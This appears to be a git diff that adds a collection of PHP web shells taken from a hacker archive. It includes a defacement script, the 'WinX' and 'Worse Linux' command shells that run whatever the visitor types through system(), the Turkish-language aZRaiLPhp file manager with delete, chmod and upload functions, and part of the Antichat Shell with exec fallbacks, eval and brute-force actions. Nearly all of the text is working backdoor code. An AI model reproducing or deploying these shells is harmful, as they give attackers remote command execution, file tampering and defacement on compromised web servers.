+    <a href="#" onclick="set_arg('<?php echo $sh_mainurl."dQB.tar.gz"; ?>','dQB.tar.gz')">[Eggdrop]</a>
+    </form>
+</td></tr>
+<tr><td align=right>Search:</td>
+<td><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;
+    <input type=submit name=submit value="Search">
+    </form>
+    </td></tr>
+<tr><td align=right>Make File:</td>
+<td><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">
+    <input type="text" name="mkfile" size="70" value="<?php echo $dispd; ?>"> - <input type=submit value="Create"> <?php echo $wdt; ?>
+    </form></td></tr>
+<tr><td align=right>View File:</td>
+<td><form method="POST"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>">
+    <input type="text" name="f" size="70" value="<?php echo $dispd; ?>"> - <input type=submit value="View">
+    </form></td></tr>
+</table>
+<div class=barheader2 colspan=2><font color=yellow>SsEs <a href="www.h4cks.in">www.h4cks.in</a> <?php echo round(getmicrotime()-starttime,4); ?></font></div>
+</body></html>
+<?php chdir($lastdir); c99shexit(); ?>
+
diff --git a/xakep-shells/PHP/Test.php.php.txt b/xakep-shells/PHP/Test.php.php.txt
new file mode 100644
index 0000000..2b0e8a3
--- /dev/null
+++ b/xakep-shells/PHP/Test.php.php.txt
@@ -0,0 +1,13 @@
+<?php
+$entry_line="HACKed by EntriKa";
+$fp = fopen("index.php", "w");
+fputs($fp, $entry_line);
+fclose($fp);
+?>
+
+<? 
+$fp =@fopen("index.htm", "a+");
+$yazi = "test" . "\r\n";
+fwrite ($fp, "$yazi");
+fclose ($fp);
+?>
diff --git a/xakep-shells/PHP/WinX Shell.html.txt b/xakep-shells/PHP/WinX Shell.html.txt
new file mode 100644
index 0000000..9957c9f
--- /dev/null
+++ b/xakep-shells/PHP/WinX Shell.html.txt	
@@ -0,0 +1,103 @@
+<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
+<body bgcolor="#FFFFFF" text="#000000" link="#0066FF" vlink="#0066FF" alink="#0066FF">
+<?php
+
+// -----:[ Start infomation ]:-----
+// It's simple shell for all Win OS.
+// Created by greenwood from n57
+//
+// ------:[ End infomation]:-------
+
+
+set_magic_quotes_runtime(0);
+//*Variables*
+
+//-------------------------------
+
+$veros = `ver`;
+$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
+$windir = `echo %windir%`;
+
+
+//------------------------------
+   if( $cmd == "" ) {
+    $cmd = 'dir /OG /X';
+  }
+//-------------------------------
+
+
+//------------------------------
+
+print "<table  style=\"font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9px; border: 1px #000000 dotted\"  border=\"0\" cellspacing=\"1\" cellpadding=\"2\"  >";
+print    "<tr>";
+print      "<td><font color=\"#990000\">You:</font></td>" ;
+print      "<td> ".$_SERVER['REMOTE_ADDR']." [<font color=\"#0033CC\">".$host."</font>] </td>" ;
+print    "</tr>";
+print    "<tr>";
+print      "<td><font color=\"red\">Version OS:</font></td>" ;
+print      "<td><font color=\"#0066CC\"> $veros </font></td>";
+print    "</tr>";
+print    "<tr>";
+print     "<td><font color=\"#990000\">Server:</font></td>";
+print      "<td><font color=\"#0066CC\">".$_SERVER['SERVER_SIGNATURE']."</font></td>";
+print    "</tr>";
+print    "<tr>";
+print     "<td><font color=\"#990000\">Win Dir:</font></td>";
+print      "<td><font color=\"#0066CC\"> $windir </font></td>";
+print    "</tr>";
+print  "</table>";
+print  "<br>";
+
+//------- [netstat -an] and [ipconfig] and [tasklist] ------------
+print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"netstat -an\">";
+print "&nbsp;&nbsp;&nbsp;";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"ipconfig\">";
+print "&nbsp;&nbsp;&nbsp;";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"tasklist\">";
+print "</form>";
+//-------------------------------
+
+
+//-------------------------------
+
+print "<textarea style=\"width:100%; height:50% ;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" readonly>";
+       system($cmd);
+print "</textarea>";
+print "<br>";
+
+//-------------------------------
+
+print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">CMD: </font>";
+print "<br>";
+print "<input style=\"font-family: Verdana; font-size: 12px; width:50%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"text\" name=\"cmd\" value=\"$cmd\">";
+print " <input style = \"font-family: Verdana; font-size: 12px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"_run\" value=\"Run\">";
+print "</form>";
+
+//-------------------------------
+
+print "<form  enctype=\"multipart/form-data\" action=\"$PHP_SELF\" method=\"post\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Upload:</font>";
+print "<br>";
+print "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">";
+print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </font><input style=\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"userfile\" type=\"file\">";
+print " <font face=\"Verdana\" size=\"1\" color=\"#990000\">Filename on server: </font> <input style=\"font-family: Verdana; font-size: 9px;background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"serverfile\" type=\"text\">";
+print" <input style =\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" value=\"Send\">";
+print"</form>";
+
+?>
+
+
+<?
+
+// Script for uploading
+ if (is_uploaded_file($userfile)) {
+move_uploaded_file($userfile, $serverfile);
+}
+
+?>
+
+
+<center><font face="Verdana" size="1" color="#000000">Created by -:[GreenwooD]:- </font></center>
+</body></html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Worse Linux Shell.php.txt b/xakep-shells/PHP/Worse Linux Shell.php.txt
new file mode 100644
index 0000000..434721a
--- /dev/null
+++ b/xakep-shells/PHP/Worse Linux Shell.php.txt	
@@ -0,0 +1,69 @@
+<?php
+
+set_magic_quotes_runtime(0);
+
+print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
+print "<center><h1>#worst @dal.net</h1></center>";
+print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";
+print "<center><h1>Watch Your system Shany was here.</h1></center>";
+print "<center><h1>Linux Shells</h1></center>";
+print "<hr><hr>";
+
+$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
+$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
+
+$UName  = `uname -a`;
+$SCWD   = `pwd`;
+$UserID = `id`;
+
+if( $currentWD == "" ) {
+    $currentWD = $SCWD;
+}
+
+print "<table>";
+print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
+print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
+print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
+print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
+print "</table>";
+
+print "<hr><hr>";
+
+if( $_POST['_act'] == "List files!" ) {
+    $currentCMD = "ls -la";
+}
+
+print "<form method=post enctype=\"multipart/form-data\"><table>";
+
+print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
+print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
+
+print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
+print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
+
+print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
+print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
+
+print "</table></form><hr><hr>";
+
+$currentCMD = str_replace("\\\"","\"",$currentCMD);
+$currentCMD = str_replace("\\\'","\'",$currentCMD);
+
+if( $_POST['_act'] == "Upload!" ) {
+    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
+        print "<center><b>Error while uploading file!</b></center>";
+    } else {
+        print "<center><pre>";
+        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
+        print "</pre><b>File uploaded successfully!</b></center>";
+    }    
+} else {
+    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
+    $currentCMD = "cd ".$currentWD.";".$currentCMD;
+    system($currentCMD);
+    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
+}
+
+exit;
+
+?>
diff --git a/xakep-shells/PHP/aZRaiLPhp v1.0.php.txt b/xakep-shells/PHP/aZRaiLPhp v1.0.php.txt
new file mode 100644
index 0000000..17aed57
--- /dev/null
+++ b/xakep-shells/PHP/aZRaiLPhp v1.0.php.txt	
@@ -0,0 +1,284 @@
+<?php
+$default=$DOCUMENT_ROOT;
+$this_file="./azrailphp.php";
+
+if(isset($save)){
+$fname=str_replace(" ","_",$fname);
+$fname=str_replace("%20","_",$fname);
+header("Cache-control: private");
+header("Content-type: application/force-download");
+header("Content-Length: ".filesize($save));
+header("Content-Disposition: attachment; filename=$fname");
+
+$fp = fopen($save, 'r');
+fpassthru($fp);
+fclose($fp);
+unset($save);
+exit;
+}
+
+if ( function_exists('ini_get') ) {
+        $onoff = ini_get('register_globals');
+} else {
+        $onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+        @extract($_POST, EXTR_SKIP);
+        @extract($_GET, EXTR_SKIP);
+}
+
+
+function deltree($deldir) {
+        $mydir=@dir($deldir);
+        while($file=$mydir->read())        {
+                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+                        @chmod("$deldir/$file",0777);
+                        deltree("$deldir/$file");
+                }
+                if (is_file("$deldir/$file")) {
+                        @chmod("$deldir/$file",0777);
+                        @unlink("$deldir/$file");
+                }
+        }
+        $mydir->close();
+        @chmod("$deldir",0777);
+        echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>S�L�ND�:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
+        }
+
+if ($op=='phpinfo'){
+$fonk_kap = get_cfg_var("fonksiyonlar�_kapat");
+        echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu �al��m�yiii</center>";
+        exit;
+}
+
+
+echo "<html>
+      <head>
+             <title>azrail 1.0 by C-W-M</title>
+      </head>
+
+       <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
+       </body>";
+
+echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
+      <center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
+      <br>";
+echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
+echo "<br>
+      <br>";
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<div align=center>
+      <font size='+1' color='#0000FF'>Root Klas�r: $DOCUMENT_ROOT</font><br>
+      <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
+
+if(!isset($dir)){
+$dir="$default";
+}
+echo "<input type=text size=60 name=dir value='$dir'>
+<input type=submit value='GIT'><br>
+</form>
+</div>";
+
+if ($op=='up'){
+        $path=dir;
+        echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
+if(isset($dosya_gonder)) {
+
+if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
+    echo "<center><font color='#0000FF'>Dosya Ba�ar�yla G�nderildi</font></center>";
+}
+} elseif(empty($dosya_gonder)) {
+$path=$dir;
+$dir = $dosya_dizin;
+echo "$dir";
+echo "<FORM  ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
+
+echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
+echo "</form>";
+
+
+echo "</html>";
+} else {
+die ("<center><font color='#FF0000'>Dosya kopyalanam�yor!</font><center>");
+}
+}
+
+if($op=='mf'){
+    $path=$dir;
+    if(isset($dismi) && isset($kodlar)){
+                $ydosya="$path/$dismi";
+                if(file_exists("$path/$dismi")){
+                        $dos= "B�yle Bir Dosya Vard� �zerine Yaz�ld�";
+                } else {
+                        $dos = "Dosya Olu�turuldu";
+                }
+                touch ("$path/$dismi") or die("Dosya Olu�turulam�yor");
+                $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak i�in a��lam�yor");
+                fwrite($ydosya2, $kodlar) or die("Dosyaya yaz�lam�yor");
+                fclose($ydosya2);
+                echo "<center><font color='#0000FF'>$dos</font></center>";
+        } else {
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
+        echo "<center>Dosya �smi :<input type='text' name='dismi'></center><br>";
+    echo "<br>";
+    echo "<center>KODLAR</center><br>";
+    echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+    echo "</form>";
+        }
+}
+
+if($op=='md'){
+        $path=$dir;
+        if(isset($kismi) && isset($okmf)){
+                $klas�r="$path/$kismi";
+                mkdir("$klas�r", 0777) or die ("<center><font color='#0000FF'>Klas�r Olu�turulam�yor</font></center>");
+                echo "<center><font color='#0000FF'>Klas�r Olu�turuldu</font></center>";
+        }
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
+        echo "<center>Klas�r �smi :<input type='text' name='kismi'></center><br>";
+        echo "<br>";
+        echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
+        echo "</form>";
+}
+
+
+if($op=='del'){
+unlink("$fname");
+}
+
+
+if($op=='dd'){
+        $dir=$here;
+                $deldirs=$yol;
+                if(!file_exists("$deldirs")) {
+                        echo "<font color=\"#ff0000\">Dosya Yok</font>";
+                } else {
+                        deltree($deldirs);
+                }
+}
+
+
+
+if($op=='edit'){
+$yol=$fname;
+$yold=$path;
+if (isset($ok)){
+$dosya = fopen("$yol", 'w') or die("Dosya A��lam�yor");
+$metin=$tarea;
+fwrite($dosya, $metin) or die("Yaz�lam�yor!");
+fclose($dosya);
+echo "<center><font color='#0000FF'Dosya Ba�ar�yla D�zenlendi</font></center>";
+} else {
+$path=$dir;
+echo "<center>D�ZENLE: $yol</center>";
+$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya A��lam�yor</font></center>");
+$boyut=filesize($yol);
+$duzen = @fread ($dosya, $boyut);
+echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
+echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
+echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
+fclose($dosya);
+$duzen=htmlspecialchars($duzen);
+echo "</form>";
+}
+}
+
+if($op=='efp2'){
+$fileperm=base_convert($_POST['fileperm'],8,10);
+        echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 �S�ML� DOSYANIN</font></b>" : "<font color=\"#ff0000\">DE��T�R�LEMED�!!</font>";
+        echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DE��T�R�LD�</font>";
+}
+
+if($op=='efp'){
+$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
+echo "<form method=post action=./$this_file?op=efp2>
+      <div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
+      <input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
+      <input name='dir' type='hidden' value='$yol'>
+      <input type='submit' value='TAMAM' class='input'></div><br>
+      </form>";
+
+}
+
+
+$path=$dir;
+if(isset($dir)){
+if ($dir = @opendir("$dir")) {
+while (($file = readdir($dir)) !== false) {
+if($file!="." && $file!=".."){
+if(is_file("$path/$file")){
+$disk_space=filesize("$path/$file");
+$kb=$disk_space/1024;
+$total_kb = number_format($kb, 2, '.', '');
+$total_kb2="Kb";
+
+
+echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>d�zenle</a> - ";
+echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
+@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
+echo "<br></div>\n";
+}else{
+echo "<div align=left><a href='./$this_file?dir=$path/$file'>G�T></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
+$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<font color='#FFFF00'>$dirperm</font>";
+echo " <br></div>\n";
+
+}
+}
+}
+closedir($dir);
+}
+}
+
+
+
+
+
+echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klas�r�ne Git</a></center>";
+if(file_exists("B:\\")){
+echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
+} else {}
+if(file_exists("C:\\")){
+echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
+} else {}
+if (file_exists("D:\\")){
+ echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
+} else {}
+if (file_exists("E:\\")){
+ echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
+} else {}
+if (file_exists("F:\\")){
+ echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
+} else {}
+if (file_exists("G:\\")){
+ echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
+} else {}
+if (file_exists("H:\\")){
+ echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
+} else {}
+
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>SERVER B�LG�LER�</b></font><br></center>";
+echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
+echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
+echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
+echo "<br>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>��LEMLER</b></font><br></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya G�nder</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Olu�tur</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klas�r Olu�tur</a></font></center>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center>T�m haklar� sahibi 	C-W-M'ye aittir</center><br>";
+?>
+
+
+
+
diff --git a/xakep-shells/PHP/a_gedit.php.php.txt b/xakep-shells/PHP/a_gedit.php.php.txt
new file mode 100644
index 0000000..41822d7
--- /dev/null
+++ b/xakep-shells/PHP/a_gedit.php.php.txt
@@ -0,0 +1,693 @@
+<?php
+session_start();
+error_reporting(E_ALL ^ E_NOTICE);
+$self=$HTTP_SERVER_VARS['PHP_SELF'];
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
+@ini_set('max_execution_time',0);
+(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF");
+(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
+(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
+$action=$_POST['action'];
+$file=$_POST['file'];
+$dir=$_POST['dir'];
+$content='';
+$stdata='';
+$style='<STYLE>BODY{background-color: #2b2f34;color: #9acd32;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #31333b;scrollbar-shadow-color: #363940;scrollbar-highlight-color: #363940;scrollbar-3dlight-color: #363940;scrollbar-darkshadow-color: #363940;scrollbar-track-color: #363940;scrollbar-arrow-color: #363940;}input{background-color: #31333b;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #31333b;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #363940;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #91cd32;text-decoration: none;font-size: 8pt;}a:visited{color: #91cd32;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+$lang=array(
+'filext'=>'File already exists.',
+'uploadok'=>'File was successfully uploaded.',
+'dircrt'=>'Dir is created.',
+'dontlist'=>'Listing dir permission denide.',
+'dircrterr'=>'Don\'t create dir.',
+'dirnf'=>'Dir not found.',
+'filenf'=>'File not found.',
+'dontwrdir'=>'Only read current dir.',
+'empty'=>'Directory not empty or access denide.',
+'deletefileok'=>'File deleted.',
+'deletedirok'=>'Dir deleted.',
+'isdontfile'=>'Selected file this is link.',
+'cantrfile'=>'Cant read file, permission denide.',
+'onlyracc'=>'Don\'t edit, only read access.',
+'workdir'=>'Work directory: ',
+'fullacc'=>'Full access.',
+'fullaccdir'=>'Full accees you are can create and delete dir.',
+'thisnodir'=>'This is don\'t dir.',
+'allfuncsh'=>'All function for work shell was disabled.'
+);
+
+$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir','brute','mysql');//here added new actions
+
+function test_file($file){
+if(!file_exists($file))$err="1";
+elseif(!is_file($file)) $err="2";
+elseif(!is_readable($file))$err="3";
+elseif(!is_writable($file))$err="4"; else $err="5";
+return $err;}
+
+function test_dir($dir){
+if(!file_exists($dir))$err="1";
+elseif(!is_dir($dir)) $err="2";
+elseif(!is_readable($dir))$err="3";
+elseif(!is_writable($dir))$err="4"; else $err="5";
+return $err;}
+
+function perms($file){ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;} 
+
+function view_size($size){
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;}
+
+if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
+
+if(isset($dir)){
+  $ts['test']=test_dir($dir); 
+  switch($ts['test']){
+    case 1:$stdata.=$lang['dirnf'];break;
+    case 2:$stdata.=$lang['thisnodir'];break;
+    case 3:$stdata.=$lang['dontlist'];break;
+    case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
+    case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
+}else $dir=@chdir($dir);
+
+$dir=getcwd()."/";
+$dir=str_replace("\\","/",$dir);
+
+if(isset($file)){
+    $ts['test1']=test_file($file);
+  switch ($ts['test1']){
+    case 1:$stdata.=$lang['filenf'];break;
+	case 2:$stdata.=$lang['isdontfile'];break;
+	case 3:$stdata.=$lang['cantrfile'];break;
+	case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
+	case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
+}
+
+function shell($cmd)
+{
+  global $lang;
+ $ret = '';
+ if (!empty($cmd))
+ {
+  if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
+  elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
+  elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
+  else $ret=$lang['allfuncsh'];
+ }
+ return $ret;
+}
+
+function createdir($dir){mkdir($dir);}
+
+//delete file
+if($action=="delete"){ 
+if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> Click here for back in viewer</a>";
+}
+//delete dir
+if($action=="deletedir"){ 
+if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> Click here for back in viewer</a>";
+else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> Click here for back in viewer</a>";
+}
+//shell
+if($action=="shell"){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
+<input type=\"submit\" value=\"execute\"></form>";}
+//editor  
+if($action=="editor"){
+  $stdata.="<tr><td><form method=POST>
+  <input type=\"hidden\" name=\"action\" value=\"editor\">
+  <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+  Open file:<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\">>\"></form>";	  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+}
+  function readf($file){
+  clearstatcache();
+  $f=fopen($file, "r");
+  $contents = fread($f,filesize($file));
+  fclose($f);
+  return htmlspecialchars($contents);
+}
+if(@$_POST['save'])writef($file,$_POST['data']);
+if(@$_POST['create'])writef($file,"");
+$test=test_file($file);
+if($test==1){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
+<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
+<input type=\"reset\" value=\"No\"></form>";
+}
+if($test>2){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
